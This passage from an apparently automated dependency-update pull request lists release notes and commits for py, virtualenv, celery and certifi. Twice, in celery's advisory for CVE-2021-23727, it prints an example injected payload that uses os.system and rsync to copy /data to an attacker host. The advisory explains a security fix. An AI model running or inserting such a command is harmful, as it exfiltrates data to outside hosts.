href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.4.30...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `virtualenv` from 12.0.2 to 20.26.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/releases\"\u003evirtualenv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e20.26.6\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.5 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2766\"\u003epypa/virtualenv#2766\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts by \u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y5c4l3\"\u003e\u003ccode\u003e@​y5c4l3\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2771\"\u003epypa/virtualenv#2771\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.5...20.26.6\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.5\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.4 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2761\"\u003epypa/virtualenv#2761\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse uv over pip by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2765\"\u003epypa/virtualenv#2765\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.4...20.26.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.3 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2742\"\u003epypa/virtualenv#2742\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix whitespace around backticks in changelog by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2751\"\u003epypa/virtualenv#2751\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTest latest Python 3.13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2752\"\u003epypa/virtualenv#2752\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix typo in Nushell activation script by \u003ca href=\"https://github.com/edmorley\"\u003e\u003ccode\u003e@​edmorley\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2754\"\u003epypa/virtualenv#2754\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGitHub Actions: Replace deprecated macos-12 with macos-13 by \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2756\"\u003epypa/virtualenv#2756\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2728\"\u003e#2728\u003c/a\u003e: Activating venv create unwanted console output  by \u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade bundled wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2760\"\u003epypa/virtualenv#2760\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ShootGan\"\u003e\u003ccode\u003e@​ShootGan\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2748\"\u003epypa/virtualenv#2748\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.3...20.26.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003erelease 20.26.2 by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2724\"\u003epypa/virtualenv#2724\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump embeded wheels by \u003ca href=\"https://github.com/gaborbernat\"\u003e\u003ccode\u003e@​gaborbernat\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pypa/virtualenv/pull/2741\"\u003epypa/virtualenv#2741\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\"\u003ehttps://github.com/pypa/virtualenv/compare/20.26.2...20.26.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e20.26.2\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/virtualenv/blob/main/docs/changelog.rst\"\u003evirtualenv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev20.26.6 (2024-09-27)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.6\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- Properly quote string placeholders in activation script templates to mitigate\n  potential command injection - by :user:`y5c4l3`. (:issue:`2768`)\n\u003ch2\u003ev20.26.5 (2024-09-17)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.5\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade embedded wheels: setuptools to \u003ccode\u003e75.1.0\u003c/code\u003e from \u003ccode\u003e74.1.2\u003c/code\u003e - by :user:\u003ccode\u003egaborbernat\u003c/code\u003e. (:issue:\u003ccode\u003e2765\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.4 (2024-09-07)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.4\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- no longer create `()` output in console during activation of a virtualenv by .bat file. (:issue:`2728`)\n- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003ewheel to \u003ccode\u003e0.44.0\u003c/code\u003e from \u003ccode\u003e0.43.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.2\u003c/code\u003e from \u003ccode\u003e24.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e74.1.2\u003c/code\u003e from \u003ccode\u003e70.1.0\u003c/code\u003e (:issue:\u003ccode\u003e2760\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.3 (2024-06-21)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.3\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eUpgrade embedded wheels:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e70.1.0\u003c/code\u003e from \u003ccode\u003e69.5.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.1\u003c/code\u003e from \u003ccode\u003e24.0\u003c/code\u003e (:issue:\u003ccode\u003e2741\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.2 (2024-05-13)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.2\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- ``virtualenv.pyz`` no longer fails when zipapp path contains a symlink - by :user:`HandSonic` and :user:`petamas`. (:issue:`1949`)\n- Fix bad return code from activate.sh if hashing is disabled - by :user:'fenkes-ibm'. (:issue:`2717`)\n\u003ch2\u003ev20.26.1 (2024-04-29)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ec04726d065372ffad9920998aef1ce41252a61d\"\u003e\u003ccode\u003eec04726\u003c/code\u003e\u003c/a\u003e release 20.26.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/86dddeda7c991f8529e1995bbff280fb7b761972\"\u003e\u003ccode\u003e86ddded\u003c/code\u003e\u003c/a\u003e Fix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2771\"\u003e#2771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/6bb3f6226c18d69bb6cfa3475b6d46dd463bb530\"\u003e\u003ccode\u003e6bb3f62\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2769\"\u003e#2769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/220d49c2e3ade2ed24f5712ab5a23895cde2e04c\"\u003e\u003ccode\u003e220d49c\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.10.1 to 1.10.2 (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2767\"\u003e#2767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/cf340c83c2828a92def78c77b3e037a2baa4d557\"\u003e\u003ccode\u003ecf340c8\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2766\"\u003e#2766\u003c/a\u003e from pypa/release-20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/f3172b4da576b88275a14d2e7bbeb98b8f958a05\"\u003e\u003ccode\u003ef3172b4\u003c/code\u003e\u003c/a\u003e release 20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/22b9795eb6bed0c17d0415c5513eca099a0a11ad\"\u003e\u003ccode\u003e22b9795\u003c/code\u003e\u003c/a\u003e Use uv over pip (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2765\"\u003e#2765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/35d8269aba12a1e3c60183a2082b2c4d0cc1192f\"\u003e\u003ccode\u003e35d8269\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2764\"\u003e#2764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ee77feb77ccb3c5deefa318630c59315bcfda521\"\u003e\u003ccode\u003eee77feb\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2763\"\u003e#2763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/c5160566293ed098ca30e0856dbf44588dd5c3a3\"\u003e\u003ccode\u003ec516056\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/virtualenv/compare/12.0.2...20.26.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `celery` from 3.1.19 to 5.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/releases\"\u003ecelery's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.2.2\u003c/h2\u003e\n\u003cp\u003eRelease date: 2021-12-26 16:30 P.M UTC+2:00\u003c/p\u003e\n\u003cp\u003eRelease by: Omer Katz\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eVarious documentation fixes.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix CVE-2021-23727 (Stored Command Injection security\nvulnerability).\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eWhen a task fails, the failure information is serialized in the\nbackend. In some cases, the exception class is only importable\nfrom the consumer's code base. In this case, we reconstruct the\nexception class so that we can re-raise the error on the process\nwhich queried the task's result. This was introduced in \u003ca href=\"https://redirect.github.com/celery/celery/issues/4836\"\u003e#4836\u003c/a\u003e. If\nthe recreated exception type isn't an exception, this is a\nsecurity issue. Without the condition included in this patch, an\nattacker could inject a remote code execution instruction such as:\n\u003ccode\u003eos.system(\u0026quot;rsync /data attacker@192.168.56.100:~/data\u0026quot;)\u003c/code\u003e by\nsetting the task's result to a failure in the result backend with\nthe os, the system function as the exception type and the payload\n\u003ccode\u003ersync /data attacker@192.168.56.100:~/data\u003c/code\u003e as the exception\narguments like so:\u003c/p\u003e\n\u003cpre lang=\"python\"\u003e\u003ccode\u003e{\n      \u0026quot;exc_module\u0026quot;: \u0026quot;os\u0026quot;,\n      'exc_type': \u0026quot;system\u0026quot;,\n      \u0026quot;exc_message\u0026quot;: \u0026quot;rsync /data attacker@192.168.56.100:~/data\u0026quot;\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eAccording to my analysis, this vulnerability can only be exploited\nif the producer delayed a task which runs long enough for the\nattacker to change the result mid-flight, and the producer has\npolled for the task's result. The attacker would also have to\ngain access to the result backend. The severity of this security\nvulnerability is low, but we still recommend upgrading.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003cp\u003eRelease date: 2021-11-16 8.55 P.M UTC+6:00\u003c/p\u003e\n\u003cp\u003eRelease by: Asif Saif Uddin\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix rstrip usage on bytes instance in ProxyLogger.\u003c/li\u003e\n\u003cli\u003ePass logfile to ExecStop in celery.service example systemd file.\u003c/li\u003e\n\u003cli\u003efix: reduce latency of AsyncResult.get under gevent (\u003ca href=\"https://redirect.github.com/celery/celery/issues/7052\"\u003e#7052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eLimit redis version: \u0026lt;4.0.0.\u003c/li\u003e\n\u003cli\u003eBump min kombu version to 5.2.2.\u003c/li\u003e\n\u003cli\u003eChange pytz\u0026gt;dev to a PEP 440 compliant pytz\u0026gt;0.dev.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/blob/main/Changelog.rst\"\u003ecelery's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.2.2\u003c/h1\u003e\n\u003cp\u003e:release-date: 2021-12-26 16:30 P.M UTC+2:00\n:release-by: Omer Katz\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eVarious documentation fixes.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix CVE-2021-23727 (Stored Command Injection security vulnerability).\u003c/p\u003e\n\u003cp\u003eWhen a task fails, the failure information is serialized in the backend.\nIn some cases, the exception class is only importable from the\nconsumer's code base. In this case, we reconstruct the exception class\nso that we can re-raise the error on the process which queried the\ntask's result. This was introduced in \u003ca href=\"https://redirect.github.com/celery/celery/issues/4836\"\u003e#4836\u003c/a\u003e.\nIf the recreated exception type isn't an exception, this is a security issue.\nWithout the condition included in this patch, an attacker could inject a remote code execution instruction such as:\n\u003ccode\u003eos.system(\u0026quot;rsync /data attacker@192.168.56.100:~/data\u0026quot;)\u003c/code\u003e\nby setting the task's result to a failure in the result backend with the os,\nthe system function as the exception type and the payload \u003ccode\u003ersync /data attacker@192.168.56.100:~/data\u003c/code\u003e as the exception arguments like so:\u003c/p\u003e\n\u003cp\u003e.. code-block:: python\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e  {\n        \u0026quot;exc_module\u0026quot;: \u0026quot;os\u0026quot;,\n        'exc_type': \u0026quot;system\u0026quot;,\n        \u0026quot;exc_message\u0026quot;: \u0026quot;rsync /data attacker@192.168.56.100:~/data\u0026quot;\n  }\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eAccording to my analysis, this vulnerability can only be exploited if\nthe producer delayed a task which runs long enough for the\nattacker to change the result mid-flight, and the producer has\npolled for the task's result.\nThe attacker would also have to gain access to the result backend.\nThe severity of this security vulnerability is low, but we still\nrecommend upgrading.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _version-5.2.1:\u003c/p\u003e\n\u003ch1\u003e5.2.1\u003c/h1\u003e\n\u003cp\u003e:release-date: 2021-11-16 8.55 P.M UTC+6:00\n:release-by: Asif Saif Uddin\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix rstrip usage on bytes instance in ProxyLogger.\u003c/li\u003e\n\u003cli\u003ePass logfile to ExecStop in celery.service example systemd file.\u003c/li\u003e\n\u003cli\u003efix: reduce latency of AsyncResult.get under gevent (\u003ca href=\"https://redirect.github.com/celery/celery/issues/7052\"\u003e#7052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eLimit redis version: \u0026lt;4.0.0.\u003c/li\u003e\n\u003cli\u003eBump min kombu version to 5.2.2.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/b21c13d234dd6d6c197436374ab1bb5db4be62c7\"\u003e\u003ccode\u003eb21c13d\u003c/code\u003e\u003c/a\u003e Bump version: 5.2.1 → 5.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/a60b4867f4bd4efa4b5a2834fcf3f757740b1b8f\"\u003e\u003ccode\u003ea60b486\u003c/code\u003e\u003c/a\u003e Add changelog for 5.2.2.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/3e5d630f478518eb775c05ba87b29024400fbe68\"\u003e\u003ccode\u003e3e5d630\u003c/code\u003e\u003c/a\u003e Fix changelog formatting.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/1f7ad7e6df1e02039b6ab9eec617d283598cad6b\"\u003e\u003ccode\u003e1f7ad7e\u003c/code\u003e\u003c/a\u003e Fix CVE-2021-23727 (Stored Command Injection securtiy vulnerability).\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/2d8dbc2a8087bbb60590465031ebd5138b8eb359\"\u003e\u003ccode\u003e2d8dbc2\u003c/code\u003e\u003c/a\u003e Update configuration.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/9596abad9060323d85d3945d8637b3cafadfefa2\"\u003e\u003ccode\u003e9596aba\u003c/code\u003e\u003c/a\u003e Fix typo in documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/639ad83239a1f9cfc58ee9852a1f107f96d3c1a1\"\u003e\u003ccode\u003e639ad83\u003c/code\u003e\u003c/a\u003e update doc to reflect Celery 5.2.x (\u003ca href=\"https://redirect.github.com/celery/celery/issues/7153\"\u003e#7153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/d32356c0e46eefecd164c55899f532c2fed2df57\"\u003e\u003ccode\u003ed32356c\u003c/code\u003e\u003c/a\u003e Bump version: 5.2.0 → 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/6842a786eeeb2d0f1fcd66408b72924b39e07836\"\u003e\u003ccode\u003e6842a78\u003c/code\u003e\u003c/a\u003e Merge branch 'master' of \u003ca href=\"https://github.com/celery/celery\"\u003ehttps://github.com/celery/celery\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/4c92cb745f658382a4eb4b94ba7938d119168165\"\u003e\u003ccode\u003e4c92cb7\u003c/code\u003e\u003c/a\u003e changelog for v5.2.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/celery/celery/compare/v3.1.19...v5.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2015.9.6.2 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca 